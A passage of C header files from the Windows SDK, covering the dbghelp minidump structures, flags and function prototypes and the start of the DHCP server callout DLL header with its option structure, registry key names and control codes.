//
// The MINIDUMP_HEADER field StreamDirectoryRva points to
// an array of MINIDUMP_DIRECTORY structures.
//
typedef struct _MINIDUMP_DIRECTORY {
ULONG32 StreamType;
MINIDUMP_LOCATION_DESCRIPTOR Location;
} MINIDUMP_DIRECTORY, *PMINIDUMP_DIRECTORY;
typedef struct _MINIDUMP_STRING {
ULONG32 Length; // Length in bytes of the string
WCHAR Buffer [0]; // Variable size buffer
} MINIDUMP_STRING, *PMINIDUMP_STRING;
//
// The MINIDUMP_DIRECTORY field StreamType may be one of the following types.
// Types will be added in the future, so if a program reading the minidump
// header encounters a stream type it does not understand it should ignore
// the data altogether. Any tag above LastReservedStream will not be used by
// the system and is reserved for program-specific information.
//
typedef enum _MINIDUMP_STREAM_TYPE {
UnusedStream = 0,
ReservedStream0 = 1,
ReservedStream1 = 2,
ThreadListStream = 3,
ModuleListStream = 4,
MemoryListStream = 5,
ExceptionStream = 6,
SystemInfoStream = 7,
ThreadExListStream = 8,
Memory64ListStream = 9,
CommentStreamA = 10,
CommentStreamW = 11,
HandleDataStream = 12,
FunctionTableStream = 13,
UnloadedModuleListStream = 14,
MiscInfoStream = 15,
MemoryInfoListStream = 16,
ThreadInfoListStream = 17,
HandleOperationListStream = 18,
TokenStream = 19,
ceStreamNull = 0x8000,
ceStreamSystemInfo = 0x8001,
ceStreamException = 0x8002,
ceStreamModuleList = 0x8003,
ceStreamProcessList = 0x8004,
ceStreamThreadList = 0x8005,
ceStreamThreadContextList = 0x8006,
ceStreamThreadCallStackList = 0x8007,
ceStreamMemoryVirtualList = 0x8008,
ceStreamMemoryPhysicalList = 0x8009,
ceStreamBucketParameters = 0x800A,
ceStreamProcessModuleMap = 0x800B,
ceStreamDiagnosisList = 0x800C,
LastReservedStream = 0xffff
} MINIDUMP_STREAM_TYPE;
//
// The minidump system information contains processor and
// Operating System specific information.
//
//
// CPU information is obtained from one of two places.
//
// 1) On x86 computers, CPU_INFORMATION is obtained from the CPUID
// instruction. You must use the X86 portion of the union for X86
// computers.
//
// 2) On non-x86 architectures, CPU_INFORMATION is obtained by calling
// IsProcessorFeatureSupported().
//
typedef union _CPU_INFORMATION {
//
// X86 platforms use CPUID function to obtain processor information.
//
struct {
//
// CPUID Subfunction 0, register EAX (VendorId [0]),
// EBX (VendorId [1]) and ECX (VendorId [2]).
//
ULONG32 VendorId [ 3 ];
//
// CPUID Subfunction 1, register EAX
//
ULONG32 VersionInformation;
//
// CPUID Subfunction 1, register EDX
//
ULONG32 FeatureInformation;
//
// CPUID, Subfunction 80000001, register EBX. This will only
// be obtained if the vendor id is "AuthenticAMD".
//
ULONG32 AMDExtendedCpuFeatures;
} X86CpuInfo;
//
// Non-x86 platforms use processor feature flags.
//
struct {
ULONG64 ProcessorFeatures [ 2 ];
} OtherCpuInfo;
} CPU_INFORMATION, *PCPU_INFORMATION;
typedef struct _MINIDUMP_SYSTEM_INFO {
//
// ProcessorArchitecture, ProcessorLevel and ProcessorRevision are all
// taken from the SYSTEM_INFO structure obtained by GetSystemInfo( ).
//
USHORT ProcessorArchitecture;
USHORT ProcessorLevel;
USHORT ProcessorRevision;
union {
USHORT Reserved0;
struct {
UCHAR NumberOfProcessors;
UCHAR ProductType;
};
};
//
// MajorVersion, MinorVersion, BuildNumber, PlatformId and
// CSDVersion are all taken from the OSVERSIONINFO structure
// returned by GetVersionEx( ).
//
ULONG32 MajorVersion;
ULONG32 MinorVersion;
ULONG32 BuildNumber;
ULONG32 PlatformId;
//
// RVA to a CSDVersion string in the string table.
//
RVA CSDVersionRva;
union {
ULONG32 Reserved1;
struct {
USHORT SuiteMask;
USHORT Reserved2;
};
};
CPU_INFORMATION Cpu;
} MINIDUMP_SYSTEM_INFO, *PMINIDUMP_SYSTEM_INFO;
//
// The minidump thread contains standard thread
// information plus an RVA to the memory for this
// thread and an RVA to the CONTEXT structure for
// this thread.
//
//
// ThreadId must be 4 bytes on all architectures.
//
C_ASSERT (sizeof ( ((PPROCESS_INFORMATION)0)->dwThreadId ) == 4);
typedef struct _MINIDUMP_THREAD {
ULONG32 ThreadId;
ULONG32 SuspendCount;
ULONG32 PriorityClass;
ULONG32 Priority;
ULONG64 Teb;
MINIDUMP_MEMORY_DESCRIPTOR Stack;
MINIDUMP_LOCATION_DESCRIPTOR ThreadContext;
} MINIDUMP_THREAD, *PMINIDUMP_THREAD;
//
// The thread list is a container of threads.
//
typedef struct _MINIDUMP_THREAD_LIST {
ULONG32 NumberOfThreads;
MINIDUMP_THREAD Threads [0];
} MINIDUMP_THREAD_LIST, *PMINIDUMP_THREAD_LIST;
typedef struct _MINIDUMP_THREAD_EX {
ULONG32 ThreadId;
ULONG32 SuspendCount;
ULONG32 PriorityClass;
ULONG32 Priority;
ULONG64 Teb;
MINIDUMP_MEMORY_DESCRIPTOR Stack;
MINIDUMP_LOCATION_DESCRIPTOR ThreadContext;
MINIDUMP_MEMORY_DESCRIPTOR BackingStore;
} MINIDUMP_THREAD_EX, *PMINIDUMP_THREAD_EX;
//
// The thread list is a container of threads.
//
typedef struct _MINIDUMP_THREAD_EX_LIST {
ULONG32 NumberOfThreads;
MINIDUMP_THREAD_EX Threads [0];
} MINIDUMP_THREAD_EX_LIST, *PMINIDUMP_THREAD_EX_LIST;
//
// The MINIDUMP_EXCEPTION is the same as EXCEPTION on Win64.
//
typedef struct _MINIDUMP_EXCEPTION {
ULONG32 ExceptionCode;
ULONG32 ExceptionFlags;
ULONG64 ExceptionRecord;
ULONG64 ExceptionAddress;
ULONG32 NumberParameters;
ULONG32 __unusedAlignment;
ULONG64 ExceptionInformation [ EXCEPTION_MAXIMUM_PARAMETERS ];
} MINIDUMP_EXCEPTION, *PMINIDUMP_EXCEPTION;
//
// The exception information stream contains the id of the thread that caused
// the exception (ThreadId), the exception record for the exception
// (ExceptionRecord) and an RVA to the thread context where the exception
// occured.
//
typedef struct MINIDUMP_EXCEPTION_STREAM {
ULONG32 ThreadId;
ULONG32 __alignment;
MINIDUMP_EXCEPTION ExceptionRecord;
MINIDUMP_LOCATION_DESCRIPTOR ThreadContext;
} MINIDUMP_EXCEPTION_STREAM, *PMINIDUMP_EXCEPTION_STREAM;
//
// The MINIDUMP_MODULE contains information about a
// a specific module. It includes the CheckSum and
// the TimeDateStamp for the module so the module
// can be reloaded during the analysis phase.
//
typedef struct _MINIDUMP_MODULE {
ULONG64 BaseOfImage;
ULONG32 SizeOfImage;
ULONG32 CheckSum;
ULONG32 TimeDateStamp;
RVA ModuleNameRva;
VS_FIXEDFILEINFO VersionInfo;
MINIDUMP_LOCATION_DESCRIPTOR CvRecord;
MINIDUMP_LOCATION_DESCRIPTOR MiscRecord;
ULONG64 Reserved0; // Reserved for future use.
ULONG64 Reserved1; // Reserved for future use.
} MINIDUMP_MODULE, *PMINIDUMP_MODULE;
//
// The minidump module list is a container for modules.
//
typedef struct _MINIDUMP_MODULE_LIST {
ULONG32 NumberOfModules;
MINIDUMP_MODULE Modules [ 0 ];
} MINIDUMP_MODULE_LIST, *PMINIDUMP_MODULE_LIST;
//
// Memory Ranges
//
typedef struct _MINIDUMP_MEMORY_LIST {
ULONG32 NumberOfMemoryRanges;
MINIDUMP_MEMORY_DESCRIPTOR MemoryRanges [0];
} MINIDUMP_MEMORY_LIST, *PMINIDUMP_MEMORY_LIST;
typedef struct _MINIDUMP_MEMORY64_LIST {
ULONG64 NumberOfMemoryRanges;
RVA64 BaseRva;
MINIDUMP_MEMORY_DESCRIPTOR64 MemoryRanges [0];
} MINIDUMP_MEMORY64_LIST, *PMINIDUMP_MEMORY64_LIST;
//
// Support for user supplied exception information.
//
typedef struct _MINIDUMP_EXCEPTION_INFORMATION {
DWORD ThreadId;
PEXCEPTION_POINTERS ExceptionPointers;
BOOL ClientPointers;
} MINIDUMP_EXCEPTION_INFORMATION, *PMINIDUMP_EXCEPTION_INFORMATION;
typedef struct _MINIDUMP_EXCEPTION_INFORMATION64 {
DWORD ThreadId;
ULONG64 ExceptionRecord;
ULONG64 ContextRecord;
BOOL ClientPointers;
} MINIDUMP_EXCEPTION_INFORMATION64, *PMINIDUMP_EXCEPTION_INFORMATION64;
//
// Support for capturing system handle state at the time of the dump.
//
// Per-handle object information varies according to
// the OS, the OS version, the processor type and
// so on. The minidump gives a minidump identifier
// to each possible data format for identification
// purposes but does not control nor describe the actual data.
typedef enum _MINIDUMP_HANDLE_OBJECT_INFORMATION_TYPE {
MiniHandleObjectInformationNone,
MiniThreadInformation1,
MiniMutantInformation1,
MiniMutantInformation2,
MiniProcessInformation1,
MiniProcessInformation2,
MiniHandleObjectInformationTypeMax
} MINIDUMP_HANDLE_OBJECT_INFORMATION_TYPE;
typedef struct _MINIDUMP_HANDLE_OBJECT_INFORMATION {
RVA NextInfoRva;
ULONG32 InfoType;
ULONG32 SizeOfInfo;
// Raw information follows.
} MINIDUMP_HANDLE_OBJECT_INFORMATION;
typedef struct _MINIDUMP_HANDLE_DESCRIPTOR {
ULONG64 Handle;
RVA TypeNameRva;
RVA ObjectNameRva;
ULONG32 Attributes;
ULONG32 GrantedAccess;
ULONG32 HandleCount;
ULONG32 PointerCount;
} MINIDUMP_HANDLE_DESCRIPTOR, *PMINIDUMP_HANDLE_DESCRIPTOR;
typedef struct _MINIDUMP_HANDLE_DESCRIPTOR_2 {
ULONG64 Handle;
RVA TypeNameRva;
RVA ObjectNameRva;
ULONG32 Attributes;
ULONG32 GrantedAccess;
ULONG32 HandleCount;
ULONG32 PointerCount;
RVA ObjectInfoRva;
ULONG32 Reserved0;
} MINIDUMP_HANDLE_DESCRIPTOR_2, *PMINIDUMP_HANDLE_DESCRIPTOR_2;
// The latest MINIDUMP_HANDLE_DESCRIPTOR definition.
typedef MINIDUMP_HANDLE_DESCRIPTOR_2 MINIDUMP_HANDLE_DESCRIPTOR_N;
typedef MINIDUMP_HANDLE_DESCRIPTOR_N *PMINIDUMP_HANDLE_DESCRIPTOR_N;
typedef struct _MINIDUMP_HANDLE_DATA_STREAM {
ULONG32 SizeOfHeader;
ULONG32 SizeOfDescriptor;
ULONG32 NumberOfDescriptors;
ULONG32 Reserved;
} MINIDUMP_HANDLE_DATA_STREAM, *PMINIDUMP_HANDLE_DATA_STREAM;
// Some operating systems can track the last operations
// performed on a handle. For example, Application Verifier
// can enable this for some versions of Windows. The
// handle operation list collects handle operations
// known for the dump target.
// Each entry is an AVRF_HANDLE_OPERATION.
typedef struct _MINIDUMP_HANDLE_OPERATION_LIST {
ULONG32 SizeOfHeader;
ULONG32 SizeOfEntry;
ULONG32 NumberOfEntries;
ULONG32 Reserved;
} MINIDUMP_HANDLE_OPERATION_LIST, *PMINIDUMP_HANDLE_OPERATION_LIST;
//
// Support for capturing dynamic function table state at the time of the dump.
//
typedef struct _MINIDUMP_FUNCTION_TABLE_DESCRIPTOR {
ULONG64 MinimumAddress;
ULONG64 MaximumAddress;
ULONG64 BaseAddress;
ULONG32 EntryCount;
ULONG32 SizeOfAlignPad;
} MINIDUMP_FUNCTION_TABLE_DESCRIPTOR, *PMINIDUMP_FUNCTION_TABLE_DESCRIPTOR;
typedef struct _MINIDUMP_FUNCTION_TABLE_STREAM {
ULONG32 SizeOfHeader;
ULONG32 SizeOfDescriptor;
ULONG32 SizeOfNativeDescriptor;
ULONG32 SizeOfFunctionEntry;
ULONG32 NumberOfDescriptors;
ULONG32 SizeOfAlignPad;
} MINIDUMP_FUNCTION_TABLE_STREAM, *PMINIDUMP_FUNCTION_TABLE_STREAM;
//
// The MINIDUMP_UNLOADED_MODULE contains information about a
// a specific module that was previously loaded but no
// longer is. This can help with diagnosing problems where
// callers attempt to call code that is no longer loaded.
//
typedef struct _MINIDUMP_UNLOADED_MODULE {
ULONG64 BaseOfImage;
ULONG32 SizeOfImage;
ULONG32 CheckSum;
ULONG32 TimeDateStamp;
RVA ModuleNameRva;
} MINIDUMP_UNLOADED_MODULE, *PMINIDUMP_UNLOADED_MODULE;
//
// The minidump unloaded module list is a container for unloaded modules.
//
typedef struct _MINIDUMP_UNLOADED_MODULE_LIST {
ULONG32 SizeOfHeader;
ULONG32 SizeOfEntry;
ULONG32 NumberOfEntries;
} MINIDUMP_UNLOADED_MODULE_LIST, *PMINIDUMP_UNLOADED_MODULE_LIST;
//
// The miscellaneous information stream contains a variety
// of small pieces of information. A member is valid if
// it's within the available size and its corresponding
// bit is set.
//
#define MINIDUMP_MISC1_PROCESS_ID 0x00000001
#define MINIDUMP_MISC1_PROCESS_TIMES 0x00000002
#define MINIDUMP_MISC1_PROCESSOR_POWER_INFO 0x00000004
#define MINIDUMP_MISC3_PROCESS_INTEGRITY 0x00000010
#define MINIDUMP_MISC3_PROCESS_EXECUTE_FLAGS 0x00000020
#define MINIDUMP_MISC3_TIMEZONE 0x00000040
#define MINIDUMP_MISC3_PROTECTED_PROCESS 0x00000080
typedef struct _MINIDUMP_MISC_INFO {
ULONG32 SizeOfInfo;
ULONG32 Flags1;
ULONG32 ProcessId;
ULONG32 ProcessCreateTime;
ULONG32 ProcessUserTime;
ULONG32 ProcessKernelTime;
} MINIDUMP_MISC_INFO, *PMINIDUMP_MISC_INFO;
typedef struct _MINIDUMP_MISC_INFO_2 {
ULONG32 SizeOfInfo;
ULONG32 Flags1;
ULONG32 ProcessId;
ULONG32 ProcessCreateTime;
ULONG32 ProcessUserTime;
ULONG32 ProcessKernelTime;
ULONG32 ProcessorMaxMhz;
ULONG32 ProcessorCurrentMhz;
ULONG32 ProcessorMhzLimit;
ULONG32 ProcessorMaxIdleState;
ULONG32 ProcessorCurrentIdleState;
} MINIDUMP_MISC_INFO_2, *PMINIDUMP_MISC_INFO_2;
typedef struct _MINIDUMP_MISC_INFO_3 {
ULONG32 SizeOfInfo;
ULONG32 Flags1;
ULONG32 ProcessId;
ULONG32 ProcessCreateTime;
ULONG32 ProcessUserTime;
ULONG32 ProcessKernelTime;
ULONG32 ProcessorMaxMhz;
ULONG32 ProcessorCurrentMhz;
ULONG32 ProcessorMhzLimit;
ULONG32 ProcessorMaxIdleState;
ULONG32 ProcessorCurrentIdleState;
ULONG32 ProcessIntegrityLevel;
ULONG32 ProcessExecuteFlags;
ULONG32 ProtectedProcess;
ULONG32 TimeZoneId;
TIME_ZONE_INFORMATION TimeZone;
} MINIDUMP_MISC_INFO_3, *PMINIDUMP_MISC_INFO_3;
// The latest MINIDUMP_MISC_INFO definition.
typedef MINIDUMP_MISC_INFO_3 MINIDUMP_MISC_INFO_N;
typedef MINIDUMP_MISC_INFO_N* PMINIDUMP_MISC_INFO_N;
//
// The memory information stream contains memory region
// description information. This stream corresponds to
// what VirtualQuery would return for the process the
// dump was created for.
//
typedef struct _MINIDUMP_MEMORY_INFO {
ULONG64 BaseAddress;
ULONG64 AllocationBase;
ULONG32 AllocationProtect;
ULONG32 __alignment1;
ULONG64 RegionSize;
ULONG32 State;
ULONG32 Protect;
ULONG32 Type;
ULONG32 __alignment2;
} MINIDUMP_MEMORY_INFO, *PMINIDUMP_MEMORY_INFO;
typedef struct _MINIDUMP_MEMORY_INFO_LIST {
ULONG SizeOfHeader;
ULONG SizeOfEntry;
ULONG64 NumberOfEntries;
} MINIDUMP_MEMORY_INFO_LIST, *PMINIDUMP_MEMORY_INFO_LIST;
//
// The memory information stream contains memory region
// description information. This stream corresponds to
// what VirtualQuery would return for the process the
// dump was created for.
//
// Thread dump writer status flags.
#define MINIDUMP_THREAD_INFO_ERROR_THREAD 0x00000001
#define MINIDUMP_THREAD_INFO_WRITING_THREAD 0x00000002
#define MINIDUMP_THREAD_INFO_EXITED_THREAD 0x00000004
#define MINIDUMP_THREAD_INFO_INVALID_INFO 0x00000008
#define MINIDUMP_THREAD_INFO_INVALID_CONTEXT 0x00000010
#define MINIDUMP_THREAD_INFO_INVALID_TEB 0x00000020
typedef struct _MINIDUMP_THREAD_INFO {
ULONG32 ThreadId;
ULONG32 DumpFlags;
ULONG32 DumpError;
ULONG32 ExitStatus;
ULONG64 CreateTime;
ULONG64 ExitTime;
ULONG64 KernelTime;
ULONG64 UserTime;
ULONG64 StartAddress;
ULONG64 Affinity;
} MINIDUMP_THREAD_INFO, *PMINIDUMP_THREAD_INFO;
typedef struct _MINIDUMP_THREAD_INFO_LIST {
ULONG SizeOfHeader;
ULONG SizeOfEntry;
ULONG NumberOfEntries;
} MINIDUMP_THREAD_INFO_LIST, *PMINIDUMP_THREAD_INFO_LIST;
//
// Support for token information.
//
typedef struct _MINIDUMP_TOKEN_INFO_HEADER {
ULONG TokenSize; // The size of the token structure.
ULONG TokenId; // The PID in NtOpenProcessToken() call or TID in NtOpenThreadToken() call.
ULONG64 TokenHandle; // The handle value returned.
} MINIDUMP_TOKEN_INFO_HEADER, *PMINIDUMP_TOKEN_INFO_HEADER;
typedef struct _MINIDUMP_TOKEN_INFO_LIST {
ULONG TokenListSize;
ULONG TokenListEntries;
ULONG ListHeaderSize;
ULONG ElementHeaderSize;
} MINIDUMP_TOKEN_INFO_LIST, *PMINIDUMP_TOKEN_INFO_LIST;
//
// Support for arbitrary user-defined information.
//
typedef struct _MINIDUMP_USER_RECORD {
ULONG32 Type;
MINIDUMP_LOCATION_DESCRIPTOR Memory;
} MINIDUMP_USER_RECORD, *PMINIDUMP_USER_RECORD;
typedef struct _MINIDUMP_USER_STREAM {
ULONG32 Type;
ULONG BufferSize;
PVOID Buffer;
} MINIDUMP_USER_STREAM, *PMINIDUMP_USER_STREAM;
typedef struct _MINIDUMP_USER_STREAM_INFORMATION {
ULONG UserStreamCount;
PMINIDUMP_USER_STREAM UserStreamArray;
} MINIDUMP_USER_STREAM_INFORMATION, *PMINIDUMP_USER_STREAM_INFORMATION;
//
// Callback support.
//
typedef enum _MINIDUMP_CALLBACK_TYPE {
ModuleCallback,
ThreadCallback,
ThreadExCallback,
IncludeThreadCallback,
IncludeModuleCallback,
MemoryCallback,
CancelCallback,
WriteKernelMinidumpCallback,
KernelMinidumpStatusCallback,
RemoveMemoryCallback,
IncludeVmRegionCallback,
IoStartCallback,
IoWriteAllCallback,
IoFinishCallback,
ReadMemoryFailureCallback,
SecondaryFlagsCallback,
} MINIDUMP_CALLBACK_TYPE;
typedef struct _MINIDUMP_THREAD_CALLBACK {
ULONG ThreadId;
HANDLE ThreadHandle;
CONTEXT Context;
ULONG SizeOfContext;
ULONG64 StackBase;
ULONG64 StackEnd;
} MINIDUMP_THREAD_CALLBACK, *PMINIDUMP_THREAD_CALLBACK;
typedef struct _MINIDUMP_THREAD_EX_CALLBACK {
ULONG ThreadId;
HANDLE ThreadHandle;
CONTEXT Context;
ULONG SizeOfContext;
ULONG64 StackBase;
ULONG64 StackEnd;
ULONG64 BackingStoreBase;
ULONG64 BackingStoreEnd;
} MINIDUMP_THREAD_EX_CALLBACK, *PMINIDUMP_THREAD_EX_CALLBACK;
typedef struct _MINIDUMP_INCLUDE_THREAD_CALLBACK {
ULONG ThreadId;
} MINIDUMP_INCLUDE_THREAD_CALLBACK, *PMINIDUMP_INCLUDE_THREAD_CALLBACK;
typedef enum _THREAD_WRITE_FLAGS {
ThreadWriteThread = 0x0001,
ThreadWriteStack = 0x0002,
ThreadWriteContext = 0x0004,
ThreadWriteBackingStore = 0x0008,
ThreadWriteInstructionWindow = 0x0010,
ThreadWriteThreadData = 0x0020,
ThreadWriteThreadInfo = 0x0040,
} THREAD_WRITE_FLAGS;
typedef struct _MINIDUMP_MODULE_CALLBACK {
PWCHAR FullPath;
ULONG64 BaseOfImage;
ULONG SizeOfImage;
ULONG CheckSum;
ULONG TimeDateStamp;
VS_FIXEDFILEINFO VersionInfo;
PVOID CvRecord;
ULONG SizeOfCvRecord;
PVOID MiscRecord;
ULONG SizeOfMiscRecord;
} MINIDUMP_MODULE_CALLBACK, *PMINIDUMP_MODULE_CALLBACK;
typedef struct _MINIDUMP_INCLUDE_MODULE_CALLBACK {
ULONG64 BaseOfImage;
} MINIDUMP_INCLUDE_MODULE_CALLBACK, *PMINIDUMP_INCLUDE_MODULE_CALLBACK;
typedef enum _MODULE_WRITE_FLAGS {
ModuleWriteModule = 0x0001,
ModuleWriteDataSeg = 0x0002,
ModuleWriteMiscRecord = 0x0004,
ModuleWriteCvRecord = 0x0008,
ModuleReferencedByMemory = 0x0010,
ModuleWriteTlsData = 0x0020,
ModuleWriteCodeSegs = 0x0040,
} MODULE_WRITE_FLAGS;
typedef struct _MINIDUMP_IO_CALLBACK {
HANDLE Handle;
ULONG64 Offset;
PVOID Buffer;
ULONG BufferBytes;
} MINIDUMP_IO_CALLBACK, *PMINIDUMP_IO_CALLBACK;
typedef struct _MINIDUMP_READ_MEMORY_FAILURE_CALLBACK
{
ULONG64 Offset;
ULONG Bytes;
HRESULT FailureStatus;
} MINIDUMP_READ_MEMORY_FAILURE_CALLBACK,
*PMINIDUMP_READ_MEMORY_FAILURE_CALLBACK;
typedef struct _MINIDUMP_CALLBACK_INPUT {
ULONG ProcessId;
HANDLE ProcessHandle;
ULONG CallbackType;
union {
HRESULT Status;
MINIDUMP_THREAD_CALLBACK Thread;
MINIDUMP_THREAD_EX_CALLBACK ThreadEx;
MINIDUMP_MODULE_CALLBACK Module;
MINIDUMP_INCLUDE_THREAD_CALLBACK IncludeThread;
MINIDUMP_INCLUDE_MODULE_CALLBACK IncludeModule;
MINIDUMP_IO_CALLBACK Io;
MINIDUMP_READ_MEMORY_FAILURE_CALLBACK ReadMemoryFailure;
ULONG SecondaryFlags;
};
} MINIDUMP_CALLBACK_INPUT, *PMINIDUMP_CALLBACK_INPUT;
typedef struct _MINIDUMP_CALLBACK_OUTPUT {
union {
ULONG ModuleWriteFlags;
ULONG ThreadWriteFlags;
ULONG SecondaryFlags;
struct {
ULONG64 MemoryBase;
ULONG MemorySize;
};
struct {
BOOL CheckCancel;
BOOL Cancel;
};
HANDLE Handle;
struct {
MINIDUMP_MEMORY_INFO VmRegion;
BOOL Continue;
};
HRESULT Status;
};
} MINIDUMP_CALLBACK_OUTPUT, *PMINIDUMP_CALLBACK_OUTPUT;
//
// A normal minidump contains just the information
// necessary to capture stack traces for all of the
// existing threads in a process.
//
// A minidump with data segments includes all of the data
// sections from loaded modules in order to capture
// global variable contents. This can make the dump much
// larger if many modules have global data.
//
// A minidump with full memory includes all of the accessible
// memory in the process and can be very large. A minidump
// with full memory always has the raw memory data at the end
// of the dump so that the initial structures in the dump can
// be mapped directly without having to include the raw
// memory information.
//
// Stack and backing store memory can be filtered to remove
// data unnecessary for stack walking. This can improve
// compression of stacks and also deletes data that may
// be private and should not be stored in a dump.
// Memory can also be scanned to see what modules are
// referenced by stack and backing store memory to allow
// omission of other modules to reduce dump size.
// In either of these modes the ModuleReferencedByMemory flag
// is set for all modules referenced before the base
// module callbacks occur.
//
// On some operating systems a list of modules that were
// recently unloaded is kept in addition to the currently
// loaded module list. This information can be saved in
// the dump if desired.
//
// Stack and backing store memory can be scanned for referenced
// pages in order to pick up data referenced by locals or other
// stack memory. This can increase the size of a dump significantly.
//
// Module paths may contain undesired information such as user names
// or other important directory names so they can be stripped. This
// option reduces the ability to locate the proper image later
// and should only be used in certain situations.
//
// Complete operating system per-process and per-thread information can
// be gathered and stored in the dump.
//
// The virtual address space can be scanned for various types
// of memory to be included in the dump.
//
// Code which is concerned with potentially private information
// getting into the minidump can set a flag that automatically
// modifies all existing and future flags to avoid placing
// unnecessary data in the dump. Basic data, such as stack
// information, will still be included but optional data, such
// as indirect memory, will not.
//
// When doing a full memory dump it's possible to store all
// of the enumerated memory region descriptive information
// in a memory information stream.
//
// Additional thread information beyond the basic thread
// structure can be collected if desired.
//
// A minidump with code segments includes all of the code
// and code-related sections from loaded modules in order
// to capture executable content.
//
// MiniDumpWithoutAuxiliaryState turns off any secondary,
// auxiliary-supported memory gathering.
//
// MiniDumpWithFullAuxiliaryState asks any present auxiliary
// data providers to include all of their state in the dump.
// The exact set of what is provided depends on the auxiliary.
// This can be quite large.
//
typedef enum _MINIDUMP_TYPE {
MiniDumpNormal = 0x00000000,
MiniDumpWithDataSegs = 0x00000001,
MiniDumpWithFullMemory = 0x00000002,
MiniDumpWithHandleData = 0x00000004,
MiniDumpFilterMemory = 0x00000008,
MiniDumpScanMemory = 0x00000010,
MiniDumpWithUnloadedModules = 0x00000020,
MiniDumpWithIndirectlyReferencedMemory = 0x00000040,
MiniDumpFilterModulePaths = 0x00000080,
MiniDumpWithProcessThreadData = 0x00000100,
MiniDumpWithPrivateReadWriteMemory = 0x00000200,
MiniDumpWithoutOptionalData = 0x00000400,
MiniDumpWithFullMemoryInfo = 0x00000800,
MiniDumpWithThreadInfo = 0x00001000,
MiniDumpWithCodeSegs = 0x00002000,
MiniDumpWithoutAuxiliaryState = 0x00004000,
MiniDumpWithFullAuxiliaryState = 0x00008000,
MiniDumpWithPrivateWriteCopyMemory = 0x00010000,
MiniDumpIgnoreInaccessibleMemory = 0x00020000,
MiniDumpWithTokenInformation = 0x00040000,
MiniDumpValidTypeFlags = 0x0007ffff,
} MINIDUMP_TYPE;
//
// In addition to the primary flags provided to
// MiniDumpWriteDump there are additional, less
// frequently used options queried via the secondary
// flags callback.
//
// MiniSecondaryWithoutPowerInfo suppresses the minidump
// query that retrieves processor power information for
// MINIDUMP_MISC_INFO.
//
typedef enum _MINIDUMP_SECONDARY_FLAGS {
MiniSecondaryWithoutPowerInfo = 0x00000001,
MiniSecondaryValidFlags = 0x00000001,
} MINIDUMP_SECONDARY_FLAGS;
//
// The minidump callback should modify the FieldsToWrite parameter to reflect
// what portions of the specified thread or module should be written to the
// file.
//
typedef
BOOL
(WINAPI * MINIDUMP_CALLBACK_ROUTINE) (
__inout PVOID CallbackParam,
__in PMINIDUMP_CALLBACK_INPUT CallbackInput,
__inout PMINIDUMP_CALLBACK_OUTPUT CallbackOutput
);
typedef struct _MINIDUMP_CALLBACK_INFORMATION {
MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
PVOID CallbackParam;
} MINIDUMP_CALLBACK_INFORMATION, *PMINIDUMP_CALLBACK_INFORMATION;
//++
//
// PVOID
// RVA_TO_ADDR(
// PVOID Mapping,
// ULONG Rva
// )
//
// Routine Description:
//
// Map an RVA that is contained within a mapped file to it's associated
// flat address.
//
// Arguments:
//
// Mapping - Base address of mapped file containing the RVA.
//
// Rva - An Rva to fixup.
//
// Return Values:
//
// A pointer to the desired data.
//
//--
#define RVA_TO_ADDR(Mapping,Rva) ((PVOID)(((ULONG_PTR) (Mapping)) + (Rva)))
BOOL
WINAPI
MiniDumpWriteDump(
__in HANDLE hProcess,
__in DWORD ProcessId,
__in HANDLE hFile,
__in MINIDUMP_TYPE DumpType,
__in_opt PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
__in_opt PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
__in_opt PMINIDUMP_CALLBACK_INFORMATION CallbackParam
);
BOOL
WINAPI
MiniDumpReadDumpStream(
__in PVOID BaseOfDump,
__in ULONG StreamNumber,
__deref_out_opt PMINIDUMP_DIRECTORY * Dir,
__deref_out_opt PVOID * StreamPointer,
__out_opt ULONG * StreamSize
);
#if defined(_MSC_VER)
#if _MSC_VER >= 800
#if _MSC_VER >= 1200
#pragma warning(pop)
#else
#pragma warning(default:4200) /* Zero length array */
#pragma warning(default:4201) /* Nameless struct/union */
#endif
#endif
#endif
#include <poppack.h>
#ifdef __cplusplus
}
#endif
#endif // _DBGHELP_
================================================
FILE: inc/DhcpSSdk.h
================================================
/*++
Copyright (C) 1997-1999 Microsoft Corporation
Module Name:
dhcpssdk.h
Abstract:
Header for writing a DHCP Callout DLL.
--*/
#ifndef _CALLOUT_H_
#define _CALLOUT_H_
#ifdef __cplusplus
extern "C" {
#endif
#if _MSC_VER > 1000
#pragma once
#endif
// This structure could change any day. This will be accurate only for version 0 -- which
// has to be checked for by any CalloutDLL that is hooking onto the DhcpHandleOptionsHook.
typedef DWORD DHCP_IP_ADDRESS;
typedef struct _DHCP_SERVER_OPTIONS {
BYTE *MessageType;
DHCP_IP_ADDRESS UNALIGNED *SubnetMask;
DHCP_IP_ADDRESS UNALIGNED *RequestedAddress;
DWORD UNALIGNED *RequestLeaseTime;
BYTE *OverlayFields;
DHCP_IP_ADDRESS UNALIGNED *RouterAddress;
DHCP_IP_ADDRESS UNALIGNED *Server;
BYTE *ParameterRequestList;
DWORD ParameterRequestListLength;
CHAR *MachineName;
DWORD MachineNameLength;
BYTE ClientHardwareAddressType;
BYTE ClientHardwareAddressLength;
BYTE *ClientHardwareAddress;
CHAR *ClassIdentifier;
DWORD ClassIdentifierLength;
BYTE *VendorClass;
DWORD VendorClassLength;
DWORD DNSFlags;
DWORD DNSNameLength;
LPBYTE DNSName;
BOOLEAN DSDomainNameRequested;
CHAR *DSDomainName;
DWORD DSDomainNameLen;
DWORD UNALIGNED *ScopeId;
} DHCP_SERVER_OPTIONS, *LPDHCP_SERVER_OPTIONS;
//
// The location in registry where the REG_MULTI_SZ list of callout DLLs
// that the DHCP Server will try to load.
//
#define DHCP_CALLOUT_LIST_KEY L"System\\CurrentControlSet\\Services\\DHCPServer\\Parameters"
#define DHCP_CALLOUT_LIST_VALUE L"CalloutDlls"
#define DHCP_CALLOUT_LIST_TYPE REG_MULTI_SZ
#define DHCP_CALLOUT_ENTRY_POINT "DhcpServerCalloutEntry"
//
// Control CODES used by DHCP Server to notify server state change.
//
#define DHCP_CONTROL_START 0x00000001
#define DHCP_CONTROL_STOP 0x00000002
#define DHCP_CONTROL_PAUSE 0x00000003
#define DHCP_CONTROL_CONTINUE 0x00000004
//
// Other ControlCodes used by various Callout HOOKS.
//
#define DHCP_DROP_DUPLICATE 0x00000001 // duplicate of pkt being processed
#define DHCP_DROP_NOMEM 0x00000002 // not enough server mem in queues
